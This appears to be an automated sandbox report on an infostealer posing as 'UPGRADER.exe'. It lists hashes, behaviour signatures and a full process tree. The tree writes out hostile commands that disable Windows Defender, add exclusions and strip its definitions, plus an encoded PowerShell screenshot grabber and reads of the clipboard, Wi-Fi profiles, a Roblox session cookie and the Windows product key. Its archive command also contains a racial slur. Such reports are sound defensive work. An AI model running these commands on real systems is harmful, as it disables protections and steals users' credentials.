Analysis

  • max time kernel
    16s
  • max time network
    18s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-05-2024 15:07

General

  • Target

    UPGRADER.exe

  • Size

    6.9MB

  • MD5

    94e23cdd6b08b5676c3a26ec85236966

  • SHA1

    02af1dc4444df4ccd2d9c44ad0e5bdb5ca7ac5fe

  • SHA256

    bf1bf24d9ea04f41a0d819cf26ea74c1a2d13395dc85860e8945d20e11d2158a

  • SHA512

    fed3b600d45bf8447b335eecb3c8bd1e8ac33bf8efb3e4ec5a2d804e6f2fc615d90894625c0320b79113a77248d597a1923eb3b09f2109ada44ce0e0b547c181

  • SSDEEP

    196608:grGT0cKeNTfm/pf+xk4dWRGtrbWOjgWy4:Ry/pWu4kRGtrbvMWy4

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 57 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 27 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\UPGRADER.exe
    "C:\Users\Admin\AppData\Local\Temp\UPGRADER.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2864
    • C:\Users\Admin\AppData\Local\Temp\UPGRADER.exe
      "C:\Users\Admin\AppData\Local\Temp\UPGRADER.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4656
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\UPGRADER.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4668
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\UPGRADER.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1596
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4016
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3824
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('WORKED', 0, 'WORKED', 48+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4508
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('WORKED', 0, 'WORKED', 48+16);close()"
          4⤵
            PID:2160
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2956
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1780
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4108
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:3416
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1360
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
            4⤵
              PID:1820
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3552
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              4⤵
                PID:4452
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:4052
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                • Suspicious use of AdjustPrivilegeToken
                PID:4472
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1848
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                4⤵
                • Detects videocard installed
                PID:3156
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌   .scr'"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:1592
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‌   .scr'
                4⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:4140
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2676
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:1204
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2440
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                4⤵
                • Enumerates processes with tasklist
                PID:4088
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              3⤵
                PID:4216
                • C:\Windows\System32\Wbem\WMIC.exe
                  WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                  4⤵
                    PID:5092
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                  3⤵
                    PID:1460
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell Get-Clipboard
                      4⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:4932
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                    3⤵
                      PID:3176
                      • C:\Windows\system32\tasklist.exe
                        tasklist /FO LIST
                        4⤵
                        • Enumerates processes with tasklist
                        PID:4368
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:3792
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:4856
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                          3⤵
                            PID:2620
                            • C:\Windows\system32\netsh.exe
                              netsh wlan show profile
                              4⤵
                                PID:2488
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "systeminfo"
                              3⤵
                                PID:4668
                                • C:\Windows\system32\systeminfo.exe
                                  systeminfo
                                  4⤵
                                  • Gathers system information
                                  PID:2596
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                3⤵
                                  PID:1084
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:1308
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wpksqm0v\wpksqm0v.cmdline"
                                      5⤵
                                        PID:2144
                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES64F4.tmp" "c:\Users\Admin\AppData\Local\Temp\wpksqm0v\CSCE5C58AED88794E7AA0A242463DC89C5.TMP"
                                          6⤵
                                            PID:4744
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                      3⤵
                                        PID:1992
                                        • C:\Windows\system32\tree.com
                                          tree /A /F
                                          4⤵
                                            PID:856
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          3⤵
                                            PID:4280
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              4⤵
                                                PID:4532
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                              3⤵
                                                PID:3884
                                                • C:\Windows\system32\tree.com
                                                  tree /A /F
                                                  4⤵
                                                    PID:3572
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                  3⤵
                                                    PID:3128
                                                    • C:\Windows\system32\tree.com
                                                      tree /A /F
                                                      4⤵
                                                        PID:3088
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      3⤵
                                                        PID:3820
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          4⤵
                                                            PID:3504
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                          3⤵
                                                            PID:2688
                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                              4⤵
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:4620
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                            3⤵
                                                              PID:3336
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                4⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:4576
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "getmac"
                                                              3⤵
                                                                PID:3644
                                                                • C:\Windows\system32\getmac.exe
                                                                  getmac
                                                                  4⤵
                                                                    PID:756
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI28642\rar.exe a -r -hp"niggers" "C:\Users\Admin\AppData\Local\Temp\ixJNc.zip" *"
                                                                  3⤵
                                                                    PID:3760
                                                                    • C:\Users\Admin\AppData\Local\Temp\_MEI28642\rar.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\_MEI28642\rar.exe a -r -hp"niggers" "C:\Users\Admin\AppData\Local\Temp\ixJNc.zip" *
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      PID:4336
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                    3⤵
                                                                      PID:4812
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        wmic os get Caption
                                                                        4⤵
                                                                          PID:4856
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                        3⤵
                                                                          PID:2148
                                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                                            wmic computersystem get totalphysicalmemory
                                                                            4⤵
                                                                              PID:856
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                            3⤵
                                                                              PID:3088
                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                wmic csproduct get uuid
                                                                                4⤵
                                                                                  PID:1184
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                3⤵
                                                                                  PID:4140
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                    4⤵
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:3512
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                  3⤵
                                                                                    PID:4428
                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                      wmic path win32_VideoController get name
                                                                                      4⤵
                                                                                      • Detects videocard installed
                                                                                      PID:3644
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                    3⤵
                                                                                      PID:3932
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                        4⤵
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        PID:2076

                                                                                Network

                                                                                MITRE ATT&CK Enterprise v15

                                                                                Replay Monitor

                                                                                Loading Replay Monitor...

                                                                                Downloads

                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                  Filesize

                                                                                  2KB

                                                                                  MD5

